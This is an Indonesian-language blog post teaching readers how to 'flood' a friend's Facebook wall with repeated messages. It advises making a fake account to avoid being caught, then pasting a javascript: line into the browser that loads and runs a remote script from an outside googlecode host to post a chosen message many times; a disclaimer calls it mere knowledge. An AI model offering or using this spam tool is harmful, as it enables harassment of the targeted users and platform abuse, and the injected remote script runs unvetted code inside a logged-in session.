YOU MIGHT ALSO LIKE

Bagaiman membanjiri (Flood) Facebook

Nah kali ini saya akan sharing bagaimana cara ngeflood facebook atau istilah indonesianya "membanjiri"
yang saya akan sharing kali ini yaitu cara ngeflood wall teman anda maaf untuk flood status saya gabisa sharing takut beranda nya kepenuhan kasian kan temen kalian haha
Pertama sekali, log masuk ke akaun anda atau anda boleh membuat akaun palsu yang baru supaya anda tidak akan ditangkap. Sekarang pergi pada wall mangsa anda. Salin sahaja skrip di bawah dan paste pada kotak url pelayar anda. Seterusnya anda harus menekan butang Enter pada papan kekunci anda.

javascript:(a = (b = document).createElement("script")).src = "http://flooder.googlecode.com/files/FBWF.js", b.body.appendChild(a); void(0)


setelah itu klik ENTER akan muncul bok kecil di layar



tulis pesan kamu >>klik ok>>tulis jumlah pesan, untuk percobaan 20 saja tunggu 5-10 detik kemudian refres atau reload halaman dan lihat hasilnya



Nb: jangan terlalu sering buat ngeflood fb orang lain agar tidak kena baned oleh pihak facebook dan ingat dosa di tanggung sendiri karna saya tidak mengajarkan untuk berbuat iseng melainkan hanya untuk menambah pengetahuan saja.
Jika berkenan, mohon bantuannya untuk memberi vote Google + untuk halaman ini dengan cara mengklik tombol G+ di samping. Jika akun Google anda sedang login, hanya dengan sekali klik voting sudah selesai. Terima kasih atas bantuannya.
Judul: Bagaiman membanjiri (Flood) Facebook; Ditulis oleh wilanda rinaldi; Rating Blog: 5 dari 5

No comments:

Post a Comment